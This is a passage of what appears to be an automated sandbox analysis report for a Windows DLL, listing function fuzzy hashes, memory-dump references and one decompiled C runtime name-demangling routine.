Opcode Fuzzy Hash: 4d69cff9033bc73a4b7d7299724d6ba2c04e4063d6f212c5b1bed39d2536568c
Instruction Fuzzy Hash: F0F09A7269420AEFC742CFADC524F1677EDEB46348F214460E518DB280DA31EEC8E640

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAF67, Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

X$"n, xrefs: 6E1DAF9F

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: X$"n
API String ID: 0-486611986
Opcode ID: 1a6f52df91f4f50dff0f720406ba8381f2bfac5fa4aad3c54c0d7090f95038ee
Instruction ID: d3e273a53f0b45f50b971b577169c8db02e500584ba5268573788ab2e26fd588
Opcode Fuzzy Hash: 1a6f52df91f4f50dff0f720406ba8381f2bfac5fa4aad3c54c0d7090f95038ee
Instruction Fuzzy Hash: C8F01CB2A24264DFCB12C788C505A8DB3ADEB45B65F214096A5419B140C6709D85D690

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAFAB, Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

\$"n, xrefs: 6E1DAFE3

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: \$"n
API String ID: 0-2455997253
Opcode ID: 138aecee91b9a33c76cdf2bc46bfac31cbb76e426850d361b647335a13429676
Instruction ID: 6ac9761084b03207dc2be916ee0bd5dc2fffee15398d97f5f5040aa4bd2ae1b6
Opcode Fuzzy Hash: 138aecee91b9a33c76cdf2bc46bfac31cbb76e426850d361b647335a13429676
Instruction Fuzzy Hash: B6F030B2A25224EFCB12DB8DC444B89B3BCEB45B54F114196F541D7240C6B4DE45D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAE14, Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

\$"n, xrefs: 6E1DAE44

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: \$"n
API String ID: 0-2455997253
Opcode ID: f8a5fefbf2c46811b78c2a92bb576f4ca65be4bc4cabc181ca77c9521271a8d2
Instruction ID: 1beb165998bd186e5590fa1738e2e11ac95564c2fe047dde973fb07af19425ac
Opcode Fuzzy Hash: f8a5fefbf2c46811b78c2a92bb576f4ca65be4bc4cabc181ca77c9521271a8d2
Instruction Fuzzy Hash: ACE06572A10248EFCB05CFA9C144A49B7FDEB48648F2084A8E459C7240EB34EE89DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DADD1, Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

X$"n, xrefs: 6E1DAE01

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: X$"n
API String ID: 0-486611986
Opcode ID: dbe9851671e95509cf8b4e9ca1b50669c996d2ee2489d7caff4462eafb68cd77
Instruction ID: 0b394353c078c7e734f25aa351138537b2914a120d8c31632d74429cb0398ecb
Opcode Fuzzy Hash: dbe9851671e95509cf8b4e9ca1b50669c996d2ee2489d7caff4462eafb68cd77
Instruction Fuzzy Hash: 79E06D72610384DFCB05CB98C544B89B7FDEB48288F204074E445C7240EB34EEC9DB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CCBC5, Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: ad1f217d076dcbdaf6537e43ce71be00dbe6ffc2c1abb192da2a789aea721717
Instruction ID: f5c54f6e2c559d82c7e55c1962b774757f343b520a9e227e0e6ae0f9645c20ec
Opcode Fuzzy Hash: ad1f217d076dcbdaf6537e43ce71be00dbe6ffc2c1abb192da2a789aea721717
Instruction Fuzzy Hash: 4F32C234A0020ADFCB14CF98C980AEEBBB5EF55704F254568DD45EB708D735AE86DB82

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D8C79, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a208a3820812083a3cea205b40b94a3c48c90e5622279120010891bb8b06e311
Instruction ID: dbcc54d4ae8c7362384431ff86fc6009d39a1198d44f278319948dd4561fad8f
Opcode Fuzzy Hash: a208a3820812083a3cea205b40b94a3c48c90e5622279120010891bb8b06e311
Instruction Fuzzy Hash: 5F323821D39F414DDB239535C83232A669CAFB73C4F21D727E82AB5D9AEB68C4C36140

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C70C3, Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1662757e308f41227c1e65dba3bb5bccc21b3b99d8df2cdc1eba293034480f
Instruction ID: 6e73e51c61f4c1199a23a1f58567aced3a986b331e5d830e94768edf19f3bed9
Opcode Fuzzy Hash: 0a1662757e308f41227c1e65dba3bb5bccc21b3b99d8df2cdc1eba293034480f
Instruction Fuzzy Hash: 7902B471A002258FDB65CFA8CC90BAAB7F8BF65704F5040EAD949E7284D7749EC19F42

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA570, Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838cd68ad34169b38099670c41409d309e20a32efdb4b99a44117d148aa3c819
Instruction ID: e9ce62c9b570e26c1cdc3420c3c58085142a59b1a3f18ac78d29b04be3518db7
Opcode Fuzzy Hash: 838cd68ad34169b38099670c41409d309e20a32efdb4b99a44117d148aa3c819
Instruction Fuzzy Hash: BAE19371A002298FDB26CF98CC90B99B3B8FF56B04F1140D9D94AE7244E7349EC19F82

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA140, Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55aeef3f0dd2779cc49e1696ff88fdc81ed05dda734bb76b1894e5801750cf4f
Instruction ID: 74aea239742523c559d2ecadd5a33ade9ebf815ead6dbd41af043d5e97664e5d
Opcode Fuzzy Hash: 55aeef3f0dd2779cc49e1696ff88fdc81ed05dda734bb76b1894e5801750cf4f
Instruction Fuzzy Hash: 8F91A271A001298BDB25CF98C8A0BDDB3B5FF99704F1541EAD90AE7244E7359EC19F82

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C7B77, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e49d802f606d7761bef62ec3b2611bcea32451e0cd9c1655951a3b8bdbaf03
Instruction ID: 584723ad19d1508dafb88deecb41c78a1c0becdbd800d6f1a9d98481150db70f
Opcode Fuzzy Hash: e0e49d802f606d7761bef62ec3b2611bcea32451e0cd9c1655951a3b8bdbaf03
Instruction Fuzzy Hash: 7751C371E0011AEFDF04CFA9C990AEEBBB2FF98304F598059E505AB241C7749E90DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E45C8, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab94a2432c92bd8de52d02550db0c62e8a887fcf46d9fc7b1d4336cca4f6c84
Instruction ID: c03fdf0e090e423a7f1d147c96e6b7be69cef819e588b3c12cb3aaba562beb0a
Opcode Fuzzy Hash: 7ab94a2432c92bd8de52d02550db0c62e8a887fcf46d9fc7b1d4336cca4f6c84
Instruction Fuzzy Hash: 9D21B373F208394B7B0CC47E8C562BDB6E1C68C501745823AF8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E44A8, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9b86cc5918797fabc1fc129fec6b2cf2cfc3557fa14c1e6905e8ccdc741d45
Instruction ID: 2cc842b3c9d21223957d7ba5e1b2a671e31d7b3f919b390843c8802b4158371c
Opcode Fuzzy Hash: ec9b86cc5918797fabc1fc129fec6b2cf2cfc3557fa14c1e6905e8ccdc741d45
Instruction Fuzzy Hash: 9E118A63F30C255B675C81BD8C172BA96D2EBD825074F533AD826E73C4E994DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AD780, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 66dad6690529f890ed062ffa00afbf5adf6108d3ff5e9996c17ea6a1ea6e5621
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: E8115E7F20094347E28885FDC8F46B6B7A5EBD622C7394376DBA14BA48D52390C9BE00

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAFEF, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a7948714644bd20ea77053115e288673a03c16e5cb69b6f33818002a929ac7
Instruction ID: 939b8b5d12b3310b6fd338dcb59a95b6a91265cffe8cb54e05ff224ba53909e5
Opcode Fuzzy Hash: 17a7948714644bd20ea77053115e288673a03c16e5cb69b6f33818002a929ac7
Instruction Fuzzy Hash: 1EE08C32911238EBCB24CBC8C900D8AF3FCEB44A44F110696B512D3200C274DE85EBC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAEB2, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0f3bd68c46b57ef36dc0bdb594fdb46d069b26ae984074a8ab2f72388312b1
Instruction ID: de84ada72f11bb9eefc536e020891c6ee48431565a226af9df9f59ef3d7fa773
Opcode Fuzzy Hash: dc0f3bd68c46b57ef36dc0bdb594fdb46d069b26ae984074a8ab2f72388312b1
Instruction Fuzzy Hash: 6AE0E235511248EFCB00CFA8C588B8AB7FDEB48658F1189A4E405D7250D338EE84EA50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2A33, Relevance: 28.8, APIs: 19, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1B2A33(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				void* __ebx;
				void* _t105;
				signed int* _t107;
				signed int _t110;
				unsigned int _t111;
				void* _t115;
				void* _t129;
				unsigned int _t134;
				void* _t142;
				void* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				unsigned int _t154;
				signed char _t156;
				void* _t162;
				intOrPtr* _t163;
				signed int _t165;
				signed int _t169;
				void* _t172;
				signed int* _t174;
				signed int _t181;
				signed int _t185;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				signed int _t195;
				unsigned int _t205;
				void* _t235;
				signed int _t253;
				signed int _t257;
				intOrPtr* _t260;
				intOrPtr* _t261;
				void* _t262;
				void* _t263;

				_t198 =  *0x6e221b68; // 0x0
				_t263 = _t262 - 0x30;
				_t105 =  *_t198;
				if(_t105 == 0) {
					L50:
					E6E1AFB49(_t198, _a4, 1, _a8);
					L51:
					_t107 = _a4;
					L52:
					return _t107;
				}
				if(_t105 < 0x36 || _t105 > 0x39) {
					if(_t105 != 0x5f) {
						goto L49;
					}
					goto L4;
				} else {
					L4:
					_t195 = _t105 - 0x36;
					_t198 = _t198 + 1;
					 *0x6e221b68 = _t198;
					if(_t195 != 0x29) {
						__eflags = _t195;
						if(_t195 < 0) {
							L49:
							_t107 = _a4;
							_t107[1] = _t107[1] & 0x00000000;
							 *_t107 =  *_t107 & 0x00000000;
							_t107[1] = 2;
							goto L52;
						}
						_t253 = _t198;
						__eflags = _t195 - 3;
						if(__eflags > 0) {
							goto L49;
						}
						L11:
						if(_t195 == 0xffffffff) {
							goto L49;
						}
						_t260 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t260;
						_v8 =  *((intOrPtr*)(_t260 + 4));
						_t110 = 2;
						_t257 = _t195 & _t110;
						if(_t257 == 0) {
							L23:
							if((_t195 & 0x00000004) != 0) {
								_t154 =  *0x6e221b70; // 0x0
								_t156 =  !(_t154 >> 1);
								_t282 = _t156 & 0x00000001;
								_push( &_v52);
								if((_t156 & 0x00000001) == 0) {
									E6E1AFE15( &_v12, E6E1B116E(_t253, __eflags));
								} else {
									_t162 = E6E1AFB1E(_t198,  &_v44, 0x20, E6E1B116E(_t253, _t282));
									_t263 = _t263 + 0x10;
									_t163 = E6E1AFB8D(_t162,  &_v28,  &_v12);
									_v12 =  *_t163;
									_v8 =  *((intOrPtr*)(_t163 + 4));
								}
							}
							_t111 =  *0x6e221b70; // 0x0
							_push( &_v52);
							if(( !(_t111 >> 1) & 0x00000001) == 0) {
								_t115 = E6E1B180D();
								_t200 =  &_v12;
								E6E1AFE15( &_v12, _t115);
							} else {
								_t152 = E6E1AFB8D(E6E1B180D(),  &_v44,  &_v12);
								_t200 =  *_t152;
								_v12 =  *_t152;
								_v8 =  *((intOrPtr*)(_t152 + 4));
							}
							if( *_t260 != 0) {
								_t148 = E6E1AFB1E(_t200,  &_v52, 0x28,  &_v12);
								_t263 = _t263 + 0xc;
								_t149 = E6E1AFBAF(_t148,  &_v44, 0x29);
								_v12 =  *_t149;
								_v8 =  *((intOrPtr*)(_t149 + 4));
							}
							_t261 = E6E1B2E9E(0x6e221b84, 8);
							if(_t261 == 0) {
								_t261 = 0;
							} else {
								 *_t261 = 0;
								 *((intOrPtr*)(_t261 + 4)) = 0;
							}
							E6E1B3CCB(0,  &_v36, _t261);
							E6E1AFC87( &_v12, E6E1AFBAF(E6E1AFB1E(0x6e221b84,  &_v44, 0x28, E6E1B0E16( &_v52)),  &_v28, 0x29));
							_t205 =  *0x6e221b70; // 0x0
							if((_t205 & 0x00000060) != 0x60 && _t257 != 0) {
								E6E1AFC87( &_v12,  &_v20);
								_t205 =  *0x6e221b70; // 0x0
							}
							_push( &_v52);
							if(( !(_t205 >> 0x13) & 0x00000001) == 0) {
								_t129 = E6E1B3BA2(_t253);
								_t209 =  &_v12;
								E6E1AFE15( &_v12, _t129);
							} else {
								_t142 = E6E1B3BA2(_t253);
								_t209 =  &_v12;
								E6E1AFC87( &_v12, _t142);
							}
							E6E1AFC87( &_v12, E6E1B2F28(_t209,  &_v52));
							_t134 =  *0x6e221b70; // 0x0
							_push( &_v52);
							if(( !(_t134 >> 8) & 0x00000001) == 0) {
								E6E1AFE15( &_v12, E6E1B4C32());
							} else {
								E6E1AFC87( &_v12, E6E1B4C32());
							}
							_t107 = _a4;
							if(_t261 == 0) {
								_t107[1] = 0;
								_t107[1] = 3;
								 *_t107 = 0;
							} else {
								 *_t261 = _v12;
								 *((intOrPtr*)(_t261 + 4)) = _v8;
								 *_t107 = _v36;
								_t107[1] = _v32;
							}
							goto L52;
						}
						if( *_t198 == 0x40) {
							_t33 = _t253 + 1; // 0x2
							_t165 = _t33;
							 *0x6e221b68 = _t165;
							L19:
							_t235 =  *_t165;
							if(_t235 == 0) {
								E6E1AFB8D(E6E1AF804( &_v52, 1), _a4,  &_v12);
								goto L51;
							}
							if(_t235 != 0x40) {
								goto L49;
							}
							 *0x6e221b68 = _t165 + 1;
							_t169 =  *0x6e221b70; // 0x0
							_push( &_v52);
							if((_t169 & 0x00000060) == 0x60) {
								_t172 = E6E1B4C03();
								_t198 =  &_v20;
								E6E1AFE15( &_v20, _t172);
							} else {
								_t174 = E6E1B4C03();
								_t198 =  *_t174;
								_v20 =  *_t174;
								_v16 = _t174[1];
							}
							goto L23;
						}
						_v24 = _t110;
						_v28 = "::";
						_t244 = E6E1AF764( &_v44,  &_v28);
						E6E1AFB8D(_t177,  &_v28,  &_v12);
						_v12 = _v28;
						_v8 = _v24;
						_t181 =  *0x6e221b68; // 0x0
						if( *_t181 == 0) {
							E6E1AFB8D(E6E1AF804( &_v52, 1),  &_v28,  &_v12);
							_v12 = _v28;
							_t185 = _v24;
						} else {
							_t189 = E6E1AFB1E(_t244,  &_v28, 0x20, E6E1B3CFA(_t253,  &_v44));
							_t263 = _t263 + 0x10;
							_t190 = E6E1AFB8D(_t189,  &_v52,  &_v12);
							_t185 =  *(_t190 + 4);
							_v12 =  *_t190;
						}
						_v8 = _t185;
						_t165 =  *0x6e221b68; // 0x0
						goto L19;
					}
					_t191 =  *_t198;
					if(_t191 == 0) {
						goto L50;
					} else {
						_t1 = _t198 + 1; // 0x2
						_t253 = _t1;
						_t195 = _t191 - 0x3d;
						_t198 = _t253;
						 *0x6e221b68 = _t198;
						if(_t195 < 4 || _t195 > 7) {
							_t195 = _t195 | 0xffffffff;
						}
						goto L11;
					}
				}
			}

0x6e1b2a36
0x6e1b2a3c
0x6e1b2a3f
0x6e1b2a46
0x6e1b2dd4
0x6e1b2ddc
0x6e1b2de4
0x6e1b2de4
0x6e1b2de7
0x6e1b2deb
0x6e1b2deb
0x6e1b2a4e
0x6e1b2a56
0x00000000
0x00000000
0x00000000
0x6e1b2a5c
0x6e1b2a5c
0x6e1b2a5f
0x6e1b2a62
0x6e1b2a63
0x6e1b2a6c
0x6e1b2a98
0x6e1b2a9a
0x6e1b2dc4
0x6e1b2dc4
0x6e1b2dc7
0x6e1b2dcb
0x6e1b2dce
0x00000000
0x6e1b2dce
0x6e1b2aa0
0x6e1b2aa2
0x6e1b2aa5
0x00000000
0x00000000
0x6e1b2aab
0x6e1b2aae
0x00000000
0x00000000
0x6e1b2ab4
0x6e1b2ab9
0x6e1b2abd
0x6e1b2ac5
0x6e1b2acb
0x6e1b2ace
0x6e1b2acf
0x6e1b2ad1
0x6e1b2bba
0x6e1b2bbd
0x6e1b2bbf
0x6e1b2bc6
0x6e1b2bc8
0x6e1b2bcd
0x6e1b2bce
0x6e1b2c38
0x6e1b2bd0
0x6e1b2bdc
0x6e1b2be1
0x6e1b2bee
0x6e1b2bf8
0x6e1b2bfb
0x6e1b2bfb
0x6e1b2bce
0x6e1b2c3d
0x6e1b2c4b
0x6e1b2c4c
0x6e1b2c70
0x6e1b2c77
0x6e1b2c7a
0x6e1b2c4e
0x6e1b2c5e
0x6e1b2c63
0x6e1b2c68
0x6e1b2c6b
0x6e1b2c6b
0x6e1b2c83
0x6e1b2c8f
0x6e1b2c94
0x6e1b2c9f
0x6e1b2ca9
0x6e1b2cac
0x6e1b2cac
0x6e1b2cbb
0x6e1b2cbf
0x6e1b2cc8
0x6e1b2cc1
0x6e1b2cc1
0x6e1b2cc3
0x6e1b2cc3
0x6e1b2ccf
0x6e1b2cfd
0x6e1b2d02
0x6e1b2d0f
0x6e1b2d1c
0x6e1b2d21
0x6e1b2d21
0x6e1b2d2f
0x6e1b2d33
0x6e1b2d46
0x6e1b2d4d
0x6e1b2d50
0x6e1b2d35
0x6e1b2d35
0x6e1b2d3c
0x6e1b2d3f
0x6e1b2d3f
0x6e1b2d63
0x6e1b2d68
0x6e1b2d77
0x6e1b2d78
0x6e1b2d95
0x6e1b2d7a
0x6e1b2d84
0x6e1b2d84
0x6e1b2d9a
0x6e1b2d9f
0x6e1b2db9
0x6e1b2dbc
0x6e1b2dc0
0x6e1b2da1
0x6e1b2da4
0x6e1b2da9
0x6e1b2daf
0x6e1b2db4
0x6e1b2db4
0x00000000
0x6e1b2d9f
0x6e1b2ada
0x6e1b2b78
0x6e1b2b78
0x6e1b2b7b
0x6e1b2b80
0x6e1b2b80
0x6e1b2b84
0x6e1b2c24
0x00000000
0x6e1b2c24
0x6e1b2b8d
0x00000000
0x00000000
0x6e1b2b94
0x6e1b2b99
0x6e1b2ba6
0x6e1b2ba7
0x6e1b2c00
0x6e1b2c07
0x6e1b2c0a
0x6e1b2ba9
0x6e1b2ba9
0x6e1b2baf
0x6e1b2bb4
0x6e1b2bb7
0x6e1b2bb7
0x00000000
0x6e1b2ba7
0x6e1b2ae0
0x6e1b2ae9
0x6e1b2afe
0x6e1b2b00
0x6e1b2b08
0x6e1b2b0e
0x6e1b2b11
0x6e1b2b19
0x6e1b2b60
0x6e1b2b68
0x6e1b2b6b
0x6e1b2b1b
0x6e1b2b2b
0x6e1b2b30
0x6e1b2b3d
0x6e1b2b44
0x6e1b2b47
0x6e1b2b47
0x6e1b2b6e
0x6e1b2b71
0x00000000
0x6e1b2b71
0x6e1b2a6e
0x6e1b2a72
0x00000000
0x6e1b2a78
0x6e1b2a7b
0x6e1b2a7b
0x6e1b2a7e
0x6e1b2a81
0x6e1b2a83
0x6e1b2a8c
0x6e1b2a93
0x6e1b2a93
0x00000000
0x6e1b2a8c
0x6e1b2a72

APIs

DName::operator+.LIBCMT ref: 6E1B2B00
DName::operator+.LIBCMT ref: 6E1B2B3D
DName::DName.LIBVCRUNTIME ref: 6E1B2B51
DName::operator+.LIBCMT ref: 6E1B2B60
DName::operator+.LIBCMT ref: 6E1B2BEE
